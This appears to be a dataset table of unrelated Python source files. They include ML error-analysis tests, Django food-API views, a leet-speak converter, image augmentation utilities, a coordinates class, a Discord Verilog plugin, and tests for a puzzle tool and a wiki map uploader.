id stringlengths 1 7 | text stringlengths 6 1.03M | dataset_id stringclasses 1
value |
|---|---|---|
3345520 | # Copyright (c) Microsoft Corporation
# Licensed under the MIT License.
from common_utils import (
create_iris_data, create_models_classification,
create_adult_census_data, create_kneighbors_classifier)
from erroranalysis._internal.error_analyzer import ModelAnalyzer
from erroranalysis._internal.surrogate_error_tree import (
create_surrogate_model, get_categorical_info, get_max_split_index,
traverse, TreeSide)
from erroranalysis._internal.constants import (PRED_Y,
TRUE_Y,
DIFF,
SPLIT_INDEX,
SPLIT_FEATURE,
LEAF_INDEX)
SIZE = 'size'
PARENTID = 'parentId'
ERROR = 'error'
ID = 'id'
class TestSurrogateErrorTree(object):
def test_surrogate_error_tree_iris(self):
X_train, X_test, y_train, y_test, feature_names, _ = create_iris_data()
models = create_models_classification(X_train, y_train)
for model in models:
categorical_features = []
run_error_analyzer(model, X_test, y_test, feature_names,
categorical_features)
def test_surrogate_error_tree_int_categorical(self):
X_train, X_test, y_train, y_test, categorical_features = \
create_adult_census_data()
model = create_kneighbors_classifier(X_train, y_train)
run_error_analyzer(model, X_test, y_test, list(X_train.columns),
categorical_features)
def test_traverse_tree(self):
X_train, X_test, y_train, y_test, categorical_features = \
create_adult_census_data()
model = create_kneighbors_classifier(X_train, y_train)
feature_names = list(X_train.columns)
error_analyzer = ModelAnalyzer(model, X_test, y_test,
feature_names,
categorical_features)
categorical_info = get_categorical_info(error_analyzer,
feature_names)
cat_ind_reindexed, categories_reindexed = categorical_info
pred_y = model.predict(X_test)
diff = pred_y != y_test
max_depth = 3
num_leaves = 31
min_child_samples = 20
surrogate = create_surrogate_model(error_analyzer,
X_test,
diff,
max_depth,
num_leaves,
min_child_samples,
cat_ind_reindexed)
model_json = surrogate._Booster.dump_model()
tree_structure = model_json["tree_info"][0]['tree_structure']
max_split_index = get_max_split_index(tree_structure) + 1
filtered_indexed_df = X_test
filtered_indexed_df[DIFF] = diff
filtered_indexed_df[TRUE_Y] = y_test
filtered_indexed_df[PRED_Y] = pred_y
tree = traverse(filtered_indexed_df,
tree_structure,
max_split_index,
(categories_reindexed,
cat_ind_reindexed),
[],
feature_names,
metric=error_analyzer.metric)
# create dictionary from json tree id to values
tree_dict = {}
for entry in tree:
tree_dict[entry['id']] = entry
validate_traversed_tree(tree_structure, tree_dict,
max_split_index, feature_names)
def test_min_child_samples(self):
X_train, X_test, y_train, y_test, feature_names, _ = create_iris_data()
model = create_kneighbors_classifier(X_train, y_train)
categorical_features = []
min_child_samples_list = [5, 10, 20]
for min_child_samples in min_child_samples_list:
run_error_analyzer(model, X_test, y_test, feature_names,
categorical_features,
min_child_samples=min_child_samples)
def run_error_analyzer(model, X_test, y_test, feature_names,
categorical_features, tree_features=None,
max_depth=3, num_leaves=31,
min_child_samples=20):
error_analyzer = ModelAnalyzer(model, X_test, y_test,
feature_names,
categorical_features)
if tree_features is None:
tree_features = feature_names
filters = None
composite_filters = None
tree = error_analyzer.compute_error_tree(
tree_features, filters, composite_filters,
max_depth=max_depth, num_leaves=num_leaves,
min_child_samples=min_child_samples)
assert tree is not None
assert len(tree) > 0
assert ERROR in tree[0]
assert ID in tree[0]
assert PARENTID in tree[0]
assert tree[0][PARENTID] is None
assert SIZE in tree[0]
assert tree[0][SIZE] == len(X_test)
for node in tree:
assert node[SIZE] >= min_child_samples
def validate_traversed_tree(tree, tree_dict, max_split_index,
feature_names, parent_id=None):
if SPLIT_INDEX in tree:
nodeid = tree[SPLIT_INDEX]
elif LEAF_INDEX in tree:
nodeid = max_split_index + tree[LEAF_INDEX]
else:
nodeid = 0
assert tree_dict[nodeid]['id'] == nodeid
assert tree_dict[nodeid]['parentId'] == parent_id
if SPLIT_FEATURE in tree:
node_name = feature_names[tree[SPLIT_FEATURE]]
else:
node_name = None
assert tree_dict[nodeid]['nodeName'] == node_name
# validate children
if 'leaf_value' not in tree:
left_child = tree[TreeSide.LEFT_CHILD]
right_child = tree[TreeSide.RIGHT_CHILD]
validate_traversed_tree(left_child,
tree_dict,
max_split_index,
feature_names,
nodeid)
validate_traversed_tree(right_child,
tree_dict,
max_split_index,
feature_names,
nodeid)
| StarcoderdataPython |
84321 | # Create your views here.
from fatsecret import Fatsecret
from django.http import JsonResponse
from django.conf import settings
fs = Fatsecret(settings.FATSECRET_ACCESS_KEY, settings.FATSECRET_SECRET_KEY)
def foods(request):
if request.method == 'GET':
search = request.GET["search"]
foods_detail = []
try:
foods_detail = fs.foods_search(search, max_results=50, page_number=1)
except:
foods_detail = {"error": "An error occured while processing."}
response = JsonResponse({"results":foods_detail})
return response
elif request.method == 'POST':
response = JsonResponse({"error": "must be a get method"})
return response
def food(request):
if request.method == 'GET':
search = request.GET["search"]
foods = []
try:
foods = fs.food_get(search)
except Exception as ex:
print(ex)
foods = {"error": "An error occured while processing."}
response = JsonResponse({"results":foods})
return response
elif request.method == 'POST':
response = JsonResponse({"error": "must be a get method"})
return response
def recipes(request):
if request.method == 'GET':
search = request.GET["search"]
recipes_result = []
try:
recipes_result = fs.recipes_search(search, max_results=50, page_number=1)
except Exception as ex:
print(ex)
recipes_result = {"error": "An error occured while processing."}
response = JsonResponse({"results":recipes_result})
return response
elif request.method == 'POST':
response = JsonResponse({"error": "must be a get method"})
return response
def recipe(request):
if request.method == 'GET':
search = request.GET["search"]
recipe_result = []
try:
recipe_result = fs.recipe_get(search)
except Exception as ex:
print(ex)
recipe_result = {"error": "An error occured while processing."}
response = JsonResponse({"results":recipe_result})
return response
elif request.method == 'POST':
response = JsonResponse({"error": "must be a get method"})
return response
| StarcoderdataPython |
167057 | # <NAME>
# ADS UNIFIP
# Exercicios Com Strings
# https://wiki.python.org.br/ExerciciosComStrings
'''
Leet spek generator. Leet é uma forma de se escrever o alfabeto latino usando outros símbolos em lugar das letras, como números por exemplo. A própria palavra leet admite muitas variações, como l33t ou 1337. O uso do leet reflete uma subcultura relacionada ao mundo dos jogos de computador e internet, sendo muito usada para confundir os iniciantes e afirmar-se como parte de um grupo. Pesquise sobre as principais formas de traduzir as letras. Depois, faça um programa que peça uma texto e transforme-o para a grafia leet speak.
'''
print('='*30)
print('{:*^30}'.format(' Leet spek generator '))
print('='*30)
print()
#primeiramente deve-se criar o dicióonario para cada letras do alfabeto e sua correspondente
leet = {
'A': '4',
'B': '8',
'C': '<',
'D': '[)',
'E': '&',
'F': 'ph',
'G': '6',
'H': '#',
'I': '1',
'J': 'j',
'K': '|<',
'L': '|_',
'M': '|\/|',
'N': '/\/',
'O': '0',
'P': '|*',
'Q': '9',
'R': 'l2',
'S': '5',
'T': '7',
'U': 'v',
'V': 'V',
'W': 'vv',
'X': '><',
'Y': '`/',
'Z': '2'
}
texto = input('Informe um texto: ')
print()
# usando for passar por cada letrar do texto e
for i in texto.upper():
# verificar se alfabetico o texto imprime seu correspondete valor
if i.isalpha():
print(leet[i], end='')
else:
print (' ')
print()
| StarcoderdataPython |
3294888 | <filename>augment.py
#!/usr/bin/python
# -------------------------- IMPORTS -------------------------- #
import numpy as np
import random as rn
import scipy
import skimage.util
import skimage.transform
# -------------------------- CROP -------------------------- #
#
# image: image to be cropped, scale: scale factor, keep_original_size: keep image's original shape
def crop(image, scale=0.8, keep_original_size=True):
'''
Parameters:
image: NumPy array of size NxMxC
scale: float number between 0 and 1
keep_original_size: boolean
'''
size_x, size_y, num_channels = image.shape
if (scale < 1):
max_x = int(round(size_x*scale))
max_y = int(round(size_y*scale))
dif_x = size_x - max_x
dif_y = size_y - max_y
bias_x = int(round(dif_x/2))
bias_y = int(round(dif_y/2))
image = image[bias_x:bias_x+max_x, bias_y:bias_y+max_y, :]
if (keep_original_size):
image = scipy.misc.imresize(image, (size_x,size_y,num_channels))
return image
# -------------------------- METHOS TO RANDOMLY APPLY TRANSFORMATIONS -------------------------- #
def apply_random_rotation(image):
'''
Parameters:
image: NumPy array of size NxMxC
'''
ang = rn.randint(0, 360)
return rotate(n_image, angle=ang)
def apply_random_noise(image):
'''
Parameters:
image: NumPy array of size NxMxC
'''
noise_mode = []
noise_mode.append('pepper')
noise_mode.append('s&p')
noise_mode.append('salt')
#noise_mode.append('speckle')
#noise_mode.append('gaussian')
return (skimage.util.random_noise(image, mode=noise_mode[rn.randint(0,len(noise_mode)-1)]) * 255).astype(np.uint8)
def apply_random_cropping(image):
'''
Parameters:
image: NumPy array of size NxMxC
'''
i = rn.random()
if (i >= 0.75): # Crop if the random scale is >= 75%, we don't want to lose too much info
return crop(image, scale=i)
else:
return image
def apply_random_vertical_flip(image):
'''
Parameters:
image: NumPy array of size NxMxC
'''
i = rn.random()
if (i >= 0.5): # We do this to don't flip ALL the times (50/50 prob of flipping)
return np.flipud(image) #cv.flip(image,1)
else:
return image
def apply_random_horizontal_flip(image):
'''
Parameters:
image: NumPy array of size NxMxC
'''
i = rn.random()
if (i >= 0.5): # We do this to flip just some very rare times (flip with 25% prob)
return np.fliplr(image) #cv.flip(image,0)
else:
return image
# MAIN METHOD
def apply_random_transformations(image):
'''
This method applies all the transformations using the default parameters.
Parameters:
image: NumPy array of size NxMxC
'''
image = apply_random_noise((image/255.0).astype(float))
image = apply_random_cropping(image)
image = apply_random_vertical_flip(image)
image = apply_random_horizontal_flip(image)
return image
def augment_single_data(image, labels, num_new):
'''
Augments a single image with its labels.
Parameters:
image: NumPy array of size NxMxC
labels: integer that defines the class of the image
num_new: integer that defines the number of new samples
'''
n = image.shape[0]
m = image.shape[1]
c = image.shape[2]
new_images = np.empty([num_new, n, m, c], dtype=float)
new_labels = np.zeros([num_new], dtype=int)
for i in range(0, num_new):
new_images[i,:,:,:] = apply_random_transformations(image)
new_labels[i] = labels
return new_images, new_labels
# -------------------------- Same as before but for one-hot encoding labels -------------------------- #
def augment_single_data_one_hot(image, labels, num_new):
'''
Augments a single image with its labels in one-hot encoding.
Parameters:
image: NumPy array of size NxMxC
labels: NumPy array of size [1,N] -> label in one-hot encoding
num_new: integer that defines the number of new samples
'''
n = image.shape[0]
m = image.shape[1]
c = image.shape[2]
new_images = np.empty([num_new, n, m, c], dtype=float)
new_labels = np.zeros([num_new, labels.shape[0]], dtype=int)
for i in range(0, num_new):
new_images[i,:,:,:] = apply_random_transformations(image)
new_labels[i,:] = labels
return new_images, new_labels
# -------------------------- Taking off the original dataset, and keep only the augmentated samples -------------------------- #
# Returns an augmented dataset without the original values
def augment_data_one_hot(dataset, labels, num_new):
'''
Augments dataset with its labels in one-hot encoding.
Parameters:
dataset: NumPy array of size ZxNxMxC. Thus, we have Z images of dimensions NxMxC.
labels: NumPy array of size [1,N] -> label in one-hot encoding
num_new: integer that defines the number of new samples
'''
n = dataset.shape[0]
new_dataset = []
new_labels = []
for i in range(n):
feat, lab = augment_single_data_one_hot(dataset[i,:,:,:], labels[i,:], num_new, labels.shape[1])
for c in range(feat.shape[0]):
new_dataset.append(feat[c,:,:,:])
new_labels.append(lab[c,:])
return np.asarray(new_dataset), np.asarray(new_labels)
# -------------------------- METHODS TO BALANCE IMBALANCED DATASET -------------------------- #
def get_diff_binary_classes(target):
'''
Obtain the difference of number of instances between the two classes
of the dataset. It only works for binary classes.
'''
unique, counts = np.unique(target, return_counts=True)
z = dict(zip(unique, counts))
majority_class_index = np.argmax(counts)
minority_class_index = np.argmin(counts)
difference = np.absolute(counts[0] - counts[1])
return minority_class_index, majority_class_index, counts, difference
# This method balances an imbalanced dataset (usually the train set, although it
# can be used for an entire dataset). It only works for binary classes.
def balance_dataset(dataset, target):
'''
Balance an unbalanced dataset (usually the train set, although it
can be used for the entire dataset). It only works for binary classes.
'''
# Obtain info about the classes (index of majority class, of minority class, etc.)
min_class_idx, maj_class_idx, counts, difference = get_diff_binary_classes(target)
print 'Num. of instances for each class before augmentation: ', counts
# Augment each instance of the dataset (of the minority class)
# until reaching the same number of instances of the majority class
new_dataset = dataset
new_target = target
counter = 0
i = 0
while (i < target.shape[0]):
if (target[i] == min_class_idx):
feature, label = augment_single_data(dataset[i,:,:,:], target[i], 1)
new_dataset = np.concatenate((new_dataset, feature), axis=0)
new_target = np.concatenate((new_target, label), axis=0)
counter = counter + 1
if (i == target.shape[0]-1) and (counter != difference):
i = 0
if counter == difference:
break
i = i + 1
# Check if train and trainl are balanced
min_class_idx, maj_class_idx, counts, difference = get_diff_binary_classes(new_target)
print 'Num. of instances for each class after augmentation: ', counts
# Return the balanced dataset
return new_dataset, new_target
#
| StarcoderdataPython |
112302 | # coding:utf-8
# --author-- lanhua.zhou
import os
import json
import logging
__all__ = ["get_menu_data", "MENU_KEY", "MENU_FILE"]
DIRNAME = os.path.dirname(__file__)
MENU_DIRNAME = os.path.dirname(os.path.dirname(DIRNAME))
MENU_FILE = "{}/conf/menu.json".format(MENU_DIRNAME)
MENU_KEY = ["utility", "modeling", "shading","rigging",
"assembly","animation", "fx", "rendering", "help"]
logger = logging.getLogger(__name__)
def get_menu_data():
"""
get menu scripts
rtype: list
"""
_menu_data = []
logger.info("read menu json file data")
with open(MENU_FILE, "r") as _file_handle:
_data = _file_handle.read()
_menu_data = json.loads(_data)
return _menu_data | StarcoderdataPython |
31382 | <gh_stars>0
import numpy as np
from spharpy.samplings.helpers import sph2cart
from scipy.spatial import cKDTree
class Coordinates(object):
"""Container class for coordinates in a three-dimensional space, allowing
for compact representation and convenient conversion into spherical as well
as geospatial coordinate systems.
The constructor as well as the internal representation are only
available in Cartesian coordinates. To create a Coordinates object from
a set of points in spherical coordinates, please use the
Coordinates.from_spherical() method.
Attributes
----------
x : ndarray, double
x-coordinate
y : ndarray, double
y-coordinate
z : ndarray, double
z-coordinate
"""
def __init__(self, x=None, y=None, z=None):
"""Init coordinates container
Attributes
----------
x : ndarray, double
x-coordinate
y : ndarray, double
y-coordinate
z : ndarray, double
z-coordinate
"""
super(Coordinates, self).__init__()
x = np.asarray(x, dtype=np.float64)
y = np.asarray(y, dtype=np.float64)
z = np.asarray(z, dtype=np.float64)
if not np.shape(x) == np.shape(y) == np.shape(z):
raise ValueError("Input arrays need to have same dimensions.")
self._x = x
self._y = y
self._z = z
@property
def x(self):
"""The x-axis coordinates for each point.
"""
return self._x
@x.setter
def x(self, value):
self._x = np.asarray(value, dtype=np.float64)
@property
def y(self):
"""The y-axis coordinate for each point."""
return self._y
@y.setter
def y(self, value):
self._y = np.asarray(value, dtype=np.float64)
@property
def z(self):
"""The z-axis coordinate for each point."""
return self._z
@z.setter
def z(self, value):
self._z = np.asarray(value, dtype=np.float64)
@property
def radius(self):
"""The radius for each point."""
return np.sqrt(self.x**2 + self.y**2 + self.z**2)
@radius.setter
def radius(self, radius):
x, y, z = sph2cart(np.asarray(radius, dtype=np.float64),
self.elevation,
self.azimuth)
self._x = x
self._y = y
self._z = z
@property
def azimuth(self):
"""The azimuth angle for each point."""
return np.mod(np.arctan2(self.y, self.x), 2*np.pi)
@azimuth.setter
def azimuth(self, azimuth):
x, y, z = sph2cart(self.radius,
self.elevation,
np.asarray(azimuth, dtype=np.float64))
self._x = x
self._y = y
self._z = z
@property
def elevation(self):
"""The elevation angle for each point"""
rad = self.radius
return np.arccos(self.z/rad)
@elevation.setter
def elevation(self, elevation):
x, y, z = sph2cart(self.radius,
np.asarray(elevation, dtype=np.float64),
self.azimuth)
self._x = x
self._y = y
self._z = z
@classmethod
def from_cartesian(cls, x, y, z):
"""Create a Coordinates class object from a set of points in the
Cartesian coordinate system.
Parameters
----------
x : ndarray, double
x-coordinate
y : ndarray, double
y-coordinate
z : ndarray, double
z-coordinate
"""
return Coordinates(x, y, z)
@classmethod
def from_spherical(cls, radius, elevation, azimuth):
"""Create a Coordinates class object from a set of points in the
spherical coordinate system.
Parameters
----------
radius : ndarray, double
The radius for each point
elevation : ndarray, double
The elevation angle in radians
azimuth : ndarray, double
The azimuth angle in radians
"""
radius = np.asarray(radius, dtype=np.double)
elevation = np.asarray(elevation, dtype=np.double)
azimuth = np.asarray(azimuth, dtype=np.double)
x, y, z = sph2cart(radius, elevation, azimuth)
return Coordinates(x, y, z)
@classmethod
def from_array(cls, values, coordinate_system='cartesian'):
"""Create a Coordinates class object from a set of points given as
numpy array
Parameters
----------
values : double, ndarray
Array with shape Nx3 where N is the number of points.
coordinate_system : string
Coordinate convention of the given values.
Can be Cartesian or spherical coordinates.
"""
coords = Coordinates()
if coordinate_system == 'cartesian':
coords.cartesian = values
elif coordinate_system == 'spherical':
coords.spherical = values
else:
return ValueError("This coordinate system is not supported.")
return coords
@property
def latitude(self):
"""The latitude angle as used in geospatial coordinates."""
return np.pi/2 - self.elevation
@property
def longitude(self):
"""The longitude angle as used in geospatial coordinates."""
return np.arctan2(self.y, self.x)
@property
def cartesian(self):
"""Cartesian coordinates of all points."""
return np.vstack((self.x, self.y, self.z))
@cartesian.setter
def cartesian(self, value):
"""Cartesian coordinates of all points."""
self.x = value[0, :]
self.y = value[1, :]
self.z = value[2, :]
@property
def spherical(self):
"""Spherical coordinates of all points."""
return np.vstack((self.radius, self.elevation, self.azimuth))
@spherical.setter
def spherical(self, value):
"""Cartesian coordinates of all points."""
x, y, z = sph2cart(value[0, :], value[1, :], value[2, :])
self.cartesian = np.vstack((x, y, z))
@property
def n_points(self):
"""Return number of points stored in the object"""
return self.x.size
def merge(self, other):
"""Merge another coordinates objects into this object."""
data = np.concatenate(
(self.cartesian, other.cartesian),
axis=-1
)
self.cartesian = data
def find_nearest_point(self, point):
"""Find the closest Coordinate point to a given Point.
The search for the nearest point is performed using the scipy
cKDTree implementation.
Parameters
----------
point : Coordinates
Point to find nearest neighboring Coordinate
Returns
-------
distance : ndarray, double
Distance between the point and it's closest neighbor
index : int
Index of the closest point.
"""
kdtree = cKDTree(self.cartesian.T)
distance, index = kdtree.query(point.cartesian.T)
return distance, index
def __repr__(self):
"""repr for Coordinate class
"""
if self.n_points == 1:
repr_string = "Coordinates of 1 point"
else:
repr_string = "Coordinates of {} points".format(self.n_points)
return repr_string
def __getitem__(self, index):
"""Return Coordinates at index
"""
return Coordinates(self._x[index], self._y[index], self._z[index])
def __setitem__(self, index, item):
"""Set Coordinates at index
"""
self.x[index] = item.x
self.y[index] = item.y
self.z[index] = item.z
def __len__(self):
"""Length of the object which is the number of points stored.
"""
return self.n_points
class SamplingSphere(Coordinates):
"""Class for samplings on a sphere"""
def __init__(self, x=None, y=None, z=None, n_max=None, weights=None):
"""Init for sampling class
"""
Coordinates.__init__(self, x, y, z)
if n_max is not None:
self._n_max = np.int(n_max)
else:
self._n_max = None
if weights is not None:
if len(x) != len(weights):
raise ValueError("The number of weights has to be equal to \
the number of sampling points.")
self._weights = np.asarray(weights, dtype=np.double)
else:
self._weights = None
@property
def n_max(self):
"""Spherical harmonic order."""
return self._n_max
@n_max.setter
def n_max(self, value):
self._n_max = np.int(value)
@property
def weights(self):
"""Sampling weights for numeric integration."""
return self._weights
@weights.setter
def weights(self, weights):
if len(weights) != self.n_points:
raise ValueError("The number of weights has to be equal to \
the number of sampling points.")
self._weights = np.asarray(weights, dtype=np.double)
@classmethod
def from_coordinates(cls, coords, n_max=None, weights=None):
"""Generate a spherical sampling object from a coordinates object
Parameters
----------
coords : Coordinates
Coordinate object
Returns
-------
sampling : SamplingSphere
Sampling on a sphere
"""
return SamplingSphere(coords.x, coords.y, coords.z,
n_max=n_max, weights=weights)
@classmethod
def from_cartesian(cls, x, y, z, n_max=None, weights=None):
"""Create a Coordinates class object from a set of points in the
Cartesian coordinate system.
Parameters
----------
x : ndarray, double
x-coordinate
y : ndarray, double
y-coordinate
z : ndarray, double
z-coordinate
"""
return SamplingSphere(x, y, z, n_max, weights)
@classmethod
def from_spherical(cls, radius, elevation, azimuth,
n_max=None, weights=None):
"""Create a Coordinates class object from a set of points in the
spherical coordinate system.
Parameters
----------
radius : ndarray, double
The radius for each point
elevation : ndarray, double
The elevation angle in radians
azimuth : ndarray, double
The azimuth angle in radians
"""
radius = np.asarray(radius, dtype=np.double)
elevation = np.asarray(elevation, dtype=np.double)
azimuth = np.asarray(azimuth, dtype=np.double)
x, y, z = sph2cart(radius, elevation, azimuth)
return SamplingSphere(x, y, z, n_max, weights)
@classmethod
def from_array(cls, values, n_max=None, weights=None,
coordinate_system='cartesian'):
"""Create a Coordinates class object from a set of points given as
numpy array
Parameters
----------
values : double, ndarray
Array with shape Nx3 where N is the number of points.
coordinate_system : string
Coordinate convention of the given values.
Can be Cartesian or spherical coordinates.
"""
coords = SamplingSphere(n_max=n_max, weights=weights)
if coordinate_system == 'cartesian':
coords.cartesian = values
elif coordinate_system == 'spherical':
coords.spherical = values
else:
return ValueError("This coordinate system is not supported.")
return coords
def __repr__(self):
"""repr for SamplingSphere class
"""
if self.n_points == 1:
repr_string = "Sampling with {} point".format(self.n_points)
else:
repr_string = "Sampling with {} points".format(self.n_points)
return repr_string
| StarcoderdataPython |
3391326 | from services.refresh_attendees import RefreshAttendees
from flask_api import status
from flask import jsonify
class RefreshController:
def index(self):
response = RefreshAttendees().refresh.run()
if response.is_success:
return {'status': 'The attendees were refreshed'}
else:
content = {'status': 'Something wrong happen'}
return content, status.HTTP_500_INTERNAL_SERVER_ERROR
| StarcoderdataPython |
1672723 | <reponame>ecumene/Automata
import re
from nextcord.ext import commands
import httpx
from Plugin import AutomataPlugin
BARAB_API = "https://jackharrhy.dev/barab"
CODE_BLOCK_REGEX = "```[a-z]*\n(?P<content>[\s\S]*?)\n```"
HEADERS = {"Content-Type": "text/plain"}
code_block = re.compile(CODE_BLOCK_REGEX)
class Verilog(AutomataPlugin):
"""
Verilog
Made using https://jackharrhy.dev/barab
"""
@commands.command()
async def verilog(self, ctx: commands.Context):
"""Executes all code blocks in your message as verilog"""
code = "\n\n".join(code_block.findall(ctx.message.content))
async with httpx.AsyncClient() as client:
response = await client.post(
BARAB_API,
headers=HEADERS,
content=code.encode(),
timeout=15.0
)
text = response.text.replace("````", "\`\`\`")
await ctx.send(f"```{text}```")
| StarcoderdataPython |
1734899 | <reponame>vyahello/search-words-puzzle
"""A test suite contains a set of test cases for the puzzle tool."""
from pathlib import Path
import pytest
from puzzle.__main__ import (
_random_words,
_validate_puzzle_grid_size,
_validate_puzzle_word,
_validate_puzzle_words_path,
)
pytestmark = pytest.mark.unittest
_test_path: Path = Path(__file__).parent / 'words.txt'
@pytest.mark.parametrize(
'word, grid_size, path',
(('foo', '1x1', Path('file.txt')), ('bar', '10x10', Path('file.log'))),
)
def test_valid_puzzle_payload(word: str, grid_size: str, path: Path) -> None:
"""Test the puzzle tool is able to handle valid input parameters."""
_validate_puzzle_grid_size(grid_size)
_validate_puzzle_word(word)
_validate_puzzle_words_path(path)
@pytest.mark.parametrize(
'grid_size',
('fooxbar', '', '~-.+-",#@^&%*'),
)
def test_invalid_puzzle_grid_size(grid_size: str) -> None:
"""Test the puzzle tool fails when invalid grid size parameter is passed.
ValueError should be raised in case of invalid puzzle tool parameter.
"""
with pytest.raises(ValueError):
_validate_puzzle_grid_size(grid_size)
@pytest.mark.parametrize(
'word',
('', 'AA', '100', '~-.+-",#@^&%*'),
)
def test_invalid_puzzle_word(word: str) -> None:
"""Test the puzzle tool fails when invalid word parameter is passed.
ValueError should be raised in case of invalid puzzle tool parameter.
"""
with pytest.raises(ValueError):
_validate_puzzle_word(word)
def test_invalid_puzzle_words_path() -> None:
"""Test the puzzle tool fails when invalid words path file
parameter is passed.
ValueError should be raised in case of invalid puzzle tool parameter.
"""
with pytest.raises(ValueError):
_validate_puzzle_words_path(Path('file.png'))
def test_random_words() -> None:
"""Test the puzzle random words are invoked from a test file of words."""
expected_amount_words = 3
actual_amount_words = len(
tuple(_random_words(_test_path, expected_amount_words))
)
assert expected_amount_words == actual_amount_words, (
f'Expected N words: {expected_amount_words} '
f'!= Actual N words: {actual_amount_words}'
)
| StarcoderdataPython |
104961 | #TODO also test handling of bad input
import unittest
import test
import mapupload
import wikibrowser
import os, sys
from getpass import getpass
#LOG_PATH = "mapupload.log"
#log = WikiDustLogger(path=LOG_PATH)
class MapUploadTest(unittest.TestCase):
def __init__(self, url, username, password, error):
unittest.TestCase.__init__(self)
self.url = url
self.username = username
self.password = password
self.error = error
def setUp(self):
def noQuestions(message):
return False
mapupload.askQuestion = noQuestions # don't ask to send error reports
mapupload.DEFAULT_URL = self.url
self.uploader = mapupload.MapUploader()
self.checker = wikibrowser.Browser()
self.uploader.screenshotPath = test.testImages()[0]
self.uploader.mapCode = "[PASTE URL OF IMAGE HERE test image:%s]" % os.path.basename(self.uploader.screenshotPath)
if self.error == type(None): # else it won't be needed
self.checker.loadWiki(self.url, self.username, self.password)
self.uploader.username.set(self.username)
self.uploader.password.set(<PASSWORD>)
def runTest(self):
try:
name = os.path.basename( self.uploader.screenshotPath )
code = self.uploader.mapCode
url = self.uploader.userSuppliedURL.get()
if self.error == None:
self.assertFalse( self.checker.fileExists(name) )
self.assertFalse( self.checker.codeExists(code, url) )
self.uploader.upload()
self.assertTrue( self.checker.fileExists(name) )
self.assertTrue( self.checker.codeExists(name, url) ) # actual code may change
self.assertEqual( self.error, type(self.uploader.lastSuppressed) )
else:
try:
self.uploader.upload()
self.assertEqual( self.error, type(self.uploader.lastSuppressed) )
except Exception, e:
self.assertEqual( self.error, type(e) )
print "%s is right" % self.error.__name__
except AssertionError:
print "%s should be %s" % (type(self.uploader.lastSuppressed), self.error)
print "details: %s" % self.uploader.lastSuppressed
raise SystemExit
def tearDown(self):
self.uploader.destroy()
self.checker.logout()
TEST_WIKIS = {}
JEFFWIKI = TEST_WIKIS["jeffwiki"] = {}
GOLDENBRICKS = TEST_WIKIS["goldenbricks"] = {}
REGISTRY = TEST_WIKIS["registry"] = {}
WIKIPEDIA = TEST_WIKIS["wikipedia"] = {}
# correct urls, usernames, passwords, and resulting exception types
JEFFWIKI_DEFAULTS = ( "http://wikidust.sbolstandard.org/index.php/Sandbox:Unittesting",
raw_input("JeffWiki username: "),
getpass("JeffWiki password: "), type(None) )
GOLDENBRICKS_DEFAULTS = ( "https://courses.washington.edu/synbio/goldenbricks/index.php?title=Test_3",
raw_input("UW netid username: "),
getpass("UW netid password: "), type(None) )
REGISTRY_DEFAULTS = ( "http://partsregistry.org/wiki/index.php?title=Part:BBa_K314000",
raw_input("Registry username: "),
getpass("Registry password: "), type(None) )
WIKIPEDIA_DEFAULTS = ( "http://en.wikipedia.org/wiki/User:Jeffdjohnson/map_code_sandbox2",
raw_input("Wikipedia username: "),
getpass("Wikipedia password: "), type(None) )
# test cases
JEFFWIKI["correct"] = JEFFWIKI_DEFAULTS
JEFFWIKI["locked"] = ("http://wikidust.sbolstandard.org/index.php/Main_Page", "", "", wikibrowser.PageLockedError)
JEFFWIKI["badurl"] = ("tinkercell.com", JEFFWIKI_DEFAULTS[1], JEFFWIKI_DEFAULTS[2], wikibrowser.BadURLError)
JEFFWIKI["wrongurl"] = ("http://www.tinkercell.com", JEFFWIKI_DEFAULTS[1], JEFFWIKI_DEFAULTS[2], wikibrowser.SiteLayoutError)
JEFFWIKI["nologin"] = (JEFFWIKI_DEFAULTS[0], "", "", JEFFWIKI_DEFAULTS[3])
JEFFWIKI["useronly"] = (JEFFWIKI_DEFAULTS[0], JEFFWIKI_DEFAULTS[1], "", wikibrowser.BadLoginError)
JEFFWIKI["passonly"] = (JEFFWIKI_DEFAULTS[0], "", "stuff", wikibrowser.BadLoginError)
JEFFWIKI["baduser"] = (JEFFWIKI_DEFAULTS[0], "jef", JEFFWIKI_DEFAULTS[2], wikibrowser.BadLoginError)
JEFFWIKI["badpass"] = (JEFFWIKI_DEFAULTS[0], JEFFWIKI_DEFAULTS[1], "stuff", wikibrowser.BadLoginError)
GOLDENBRICKS["correct"] = GOLDENBRICKS_DEFAULTS
GOLDENBRICKS["locked"] = ("https://courses.washington.edu/synbio/goldenbricks/index.php?title=Oscillators",
GOLDENBRICKS_DEFAULTS[1], GOLDENBRICKS_DEFAULTS[2], wikibrowser.PageLockedError)
GOLDENBRICKS["badurl"] = ("tinkercell.com", GOLDENBRICKS_DEFAULTS[1], GOLDENBRICKS_DEFAULTS[2], wikibrowser.BadURLError)
GOLDENBRICKS["wrongurl"] = ("http://www.tinkercell.com", GOLDENBRICKS_DEFAULTS[1], GOLDENBRICKS_DEFAULTS[2], wikibrowser.SiteLayoutError)
GOLDENBRICKS["nologin"] = (GOLDENBRICKS_DEFAULTS[0], "", "", wikibrowser.BadLoginError)
GOLDENBRICKS["useronly"] = (GOLDENBRICKS_DEFAULTS[0], GOLDENBRICKS_DEFAULTS[1], "", wikibrowser.BadLoginError)
GOLDENBRICKS["passonly"] = (GOLDENBRICKS_DEFAULTS[0], "", GOLDENBRICKS_DEFAULTS[2], wikibrowser.BadLoginError)
GOLDENBRICKS["baduser"] = (GOLDENBRICKS_DEFAULTS[0], "jeff2", GOLDENBRICKS_DEFAULTS[2], wikibrowser.BadLoginError)
GOLDENBRICKS["badpass"] = (GOLDENBRICKS_DEFAULTS[0], GOLDENBRICKS_DEFAULTS[1], "stuff!", wikibrowser.BadLoginError)
REGISTRY["correct"] = REGISTRY_DEFAULTS
REGISTRY["locked"] = ("http://partsregistry.org/wiki/index.php?title=MediaWiki:Monobook.css", #BE SURE THIS DOESN't WORK!!
REGISTRY_DEFAULTS[1], REGISTRY_DEFAULTS[2], wikibrowser.PageLockedError)
REGISTRY["badurl"] = ("www.amazon.com", REGISTRY_DEFAULTS[1], REGISTRY_DEFAULTS[2], wikibrowser.BadURLError)
REGISTRY["wrongurl"] = ("http://amazon.com", REGISTRY_DEFAULTS[1], REGISTRY_DEFAULTS[2], wikibrowser.SiteLayoutError)
REGISTRY["nologin"] = (REGISTRY_DEFAULTS[0], "", "", wikibrowser.BadLoginError)
REGISTRY["useronly"] = (REGISTRY_DEFAULTS[0], REGISTRY_DEFAULTS[1], "", wikibrowser.BadLoginError)
